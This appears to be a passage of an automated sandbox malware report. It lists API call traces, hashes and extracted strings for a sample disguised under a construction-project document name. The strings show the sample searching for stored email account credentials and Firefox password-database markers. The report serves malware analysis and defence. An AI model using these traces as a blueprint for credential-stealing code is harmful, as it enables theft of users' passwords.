                                                                                                                          • _mbscpy.MSVCRT(0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409686
                                                                                                                          • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,00000000,00000000,0040972B,00000000,?,00000000,00000104,?), ref: 00409696
                                                                                                                          • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                                                                            • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                          • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                          • API String ID: 888011440-2039793938
                                                                                                                          • Opcode ID: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                          • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                                                                                          • Opcode Fuzzy Hash: bcaacaf8b0ae019c7a44cf7c189e97e1f6c6f5de2524552f312430b312ca54f0
                                                                                                                          • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                          • strchr.MSVCRT ref: 0040327B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                          APIs
                                                                                                                          • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                          • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                          • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004094C8
                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                          • memset.MSVCRT ref: 0040950C
                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                          • _strcmpi.MSVCRT ref: 00409531
                                                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                          • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                          • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                          APIs
                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3642520215-0
                                                                                                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                          APIs
                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                          • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1999381814-0
                                                                                                                          • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                          • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                                                                                          • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                                                                                          • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                                          • API String ID: 1297977491-3883738016
                                                                                                                          • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                          • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                                                                                          • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                                                                                          • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: __aulldvrm$__aullrem
                                                                                                                          • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                                          • API String ID: 643879872-978417875
                                                                                                                          • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                          • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                                                                                          • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                                                                                          • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040810E
                                                                                                                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                                                                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                                                                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                                          • String ID: 0$6
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: _mbscat$memsetsprintf
                                                                                                                          • String ID: %2.2X
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                                            • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                                          • String ID: ACD
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004091EC
                                                                                                                          • sprintf.MSVCRT ref: 00409201
                                                                                                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                                          • String ID: caption$dialog_%d
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,0040FE66,00000000,00000000), ref: 004101E6
                                                                                                                          • memset.MSVCRT ref: 00410246
                                                                                                                          • memset.MSVCRT ref: 00410258
                                                                                                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                                          • memset.MSVCRT ref: 0041033F
                                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                                          • CloseHandle.KERNEL32(00000000,0040FE66,?), ref: 004103AE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                                          APIs
                                                                                                                          • wcslen.MSVCRT ref: 0044406C
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                                          • strlen.MSVCRT ref: 004440D1
                                                                                                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                                          • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                                            • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                                                                                          • _strcmpi.MSVCRT ref: 00404518
                                                                                                                          • _strcmpi.MSVCRT ref: 00404536
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: _strcmpi$memcpystrlen
                                                                                                                          • String ID: imap$pop3$smtp
                                                                                                                          • API String ID: 2025310588-821077329
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040C02D
                                                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,74DF0A60), ref: 00408EBE
                                                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,74DF0A60), ref: 00408E31
                                                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                                            • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                          • API String ID: 2726666094-3614832568
                                                                                                                          APIs
                                                                                                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2014771361-0
                                                                                                                          APIs
                                                                                                                          • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                                            • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                                            • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                                          • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                                          • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                                          • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000006.00000002.2204630217.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000006.00000002.2204630217.0000000000456000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          • Associated: 00000006.00000002.2204630217.000000000045C000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_6_2_400000_Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcmp$memcpy
                                                                                                                          • String ID: global-salt$password-check
                                                                                                                          • API String ID: 231171946-3927197501
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
